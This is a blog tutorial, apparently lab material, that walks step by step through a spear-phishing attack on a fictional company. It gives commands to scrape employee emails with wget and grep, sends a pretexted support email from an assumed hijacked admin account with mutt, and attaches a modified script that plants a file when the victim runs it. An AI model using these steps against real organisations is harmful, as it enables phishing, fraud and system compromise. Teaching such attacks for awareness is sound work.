• Lucifer

Spearphishing

Spear phishing is an advanced form of social engineering that is more effective than traditional phishing scams, as it is tailored to a specific target. Spear phishing messages are customized, thanks to a thorough operation of intelligence perpetrated by the phishers that collect information from corporate websites and social networks on their target. So let's see step by step.

Spearphishing

Step 1: Browsing to Target Company Website


In this post, we will use a very simple example to go through the steps of a typical spear-phishing attack. Let's say that we want to target one of the employees of a fictional company Skillset Local. First, let's take a look at the company website:


lynx http://skillsetlocal.com

Spearphishing

Step 2: Looking at Company Profile


Just as real attackers do, we should invest some time into gathering information about the target company. Use your arrow keys to navigate to the "Our Mission" link and hit Enter.

Spearphishing

We can see that *Skillset Local *creates custom scripts. This may come handy later.

Spearphishing

Step 3: Selecting Spear Phishing Target


Now go to the "Our Team" page, which is basically the company directory.

Spearphishing

This displays the Skillset Local employees' names, job descriptions, and contact information. One of the possible attack scenarios would be to send a customer support request to Bob.

Spearphishing

Step 4: Extracting Email Addresses


Our "target website" is very small, and all information, including email addresses, is conveniently displayed on one page. Real business websites can be quite large, without a single location for email addresses. There are numerous tools designed for scraping email addresses from public websites. Most of them utilize search engines to collect email addresses based on the target domain name.


Alternatively, you can use wget to download the contents of the website, and then grep for email addresses. Let's try that. First, create a new directory and change to it:

mkdir targetsite

cd targetsite

Spearphishing

Next, run the following command:


wget -q -r http://skillsetlocal.com && grep -E -o -r "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"

Spearphishing

Let's walk through the options. For wget, the* -q* options sets the 'quiet' mode, so no output is displayed, and* -r* stands for 'recursive'. For grep, we are using -E (for 'extended' regular expressions), displaying only (-o) the email addresses (matching the pattern), and looking recursively in our newly created directory.

Change back to the home directory before moving on to the next step:


cd ~

Spearphishing

Step 5: Sending Spear Phishing Email


Let's say that we managed to hijack the admin@skillsetlocal.com email account. This will make things easier for us: Bob will most likely open an email if it comes from someone he trusts. All we need to do now is craft a convincing message and attach a file that will do something malicious once Bob download and runs it. We will use mutt, a small but powerful text-based email client. The following command will send a message to Bob and attach the leap_year.sh file to it:


echo "Bob, please see the attached file. Customer claims that script doesn't work." | mutt -a "leap_year.sh" -s "Customer Support request" -- skillsetuser1@skillsetlocal.com

Spearphishing

Step 6: Switching Users


Now let's play the unsuspecting victim. Switch to Bob's account by entering the following command and entering p@ssw0rd when prompted for a password.

su - skillsetuser1

Spearphishing

Step 7: Checking Email


Now let's check email. Enter the mutt to open the email client.

mutt

Spearphishing

If prompted, press the y key to confirm creating the mailbox.


Step 8: Saving Attachment


You should see our spear-phishing email in the inbox. Hit Enter to open it.

Spearphishing

Next, hit v to view the attachment.

Spearphishing

You will see a list of two files, the one on the bottom being our script. Select it by entering 2 and hitting Enter to confirm "Jump to: 2".

Spearphishing

Next, hit * s** to save the file. On the bottom, you should see the "Save to file:" prompt. Change the path so we can save the attachment to the */tmp folder: /tmp/leap_year.sh

Spearphishing

Step 9: Checking /tmp Folder


This script determines whether the year provided by the user is a leap year. But we modified it slightly, so it creates a file on the local system when executed. First, do a directory listing of the /tmp folder:

ls /tmp

Spearphishing

You should see our downloaded attachment there.


Step 10: Making File Executable


Now issue the following command to make the script executable:

chmod +x /tmp/leap_year.sh

Spearphishing

Step 11: Running Downloaded Script


Run the script and provide any numeric value to replace the xxxx.

./tmp/leap_year.sh 2020

Spearphishing

Step 12: Checking /tmp Folder


Now run the* ls* command on the /tmp folder again. You will see a file that wasn't there earlier.

ls /tmp

Spearphishing

This file doesn't do anything other than illustrating how easy it is to plant something on a system once a user is tricked into saving and opening an email attachment. In the Client-Side Attack post HERE, you will see exactly what kind of damage can be done with this type of compromise.


Also read: Server Side Exploitation


That's it for this post hope you will learn something new from this post, please share it with your friends and more amazing stuff is waiting for you, checkout shop at Payground or visit HERE.

 
Join Telegram Group

©2020 by Payground. Proudly created with Wix.com